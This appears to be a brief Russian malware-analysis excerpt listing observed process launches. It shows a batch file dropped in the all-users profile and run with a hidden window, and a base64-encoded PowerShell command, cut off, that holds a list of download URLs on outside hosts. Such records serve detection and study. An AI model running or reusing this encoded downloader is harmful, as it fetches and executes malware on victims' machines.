Техническая информация
- '<SYSTEM32>\cmd.exe' /c %ALLUSERSPROFILE%\wgefjd.bat
- %ALLUSERSPROFILE%\wgefjd.bat
- '<SYSTEM32>\cmd.exe' /c %ALLUSERSPROFILE%\wgefjd.bat' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enc JABzAHQAcgBzAD0AIgBoAHQAdABwADoALwAvAGMAdQBvAGkAaABvAGkAdAB1AGcAaQBhAC4AYwBvAG0ALwBhAGUAYwBpAGQAaQBvAHMAdABhAGcAZQAvADIAZwB5AEEANQB1AE4AbAA2AFYAUABRAFUAQQAvACwAaAB0AHQAcAA6AC8ALwBjAGsAZgBv...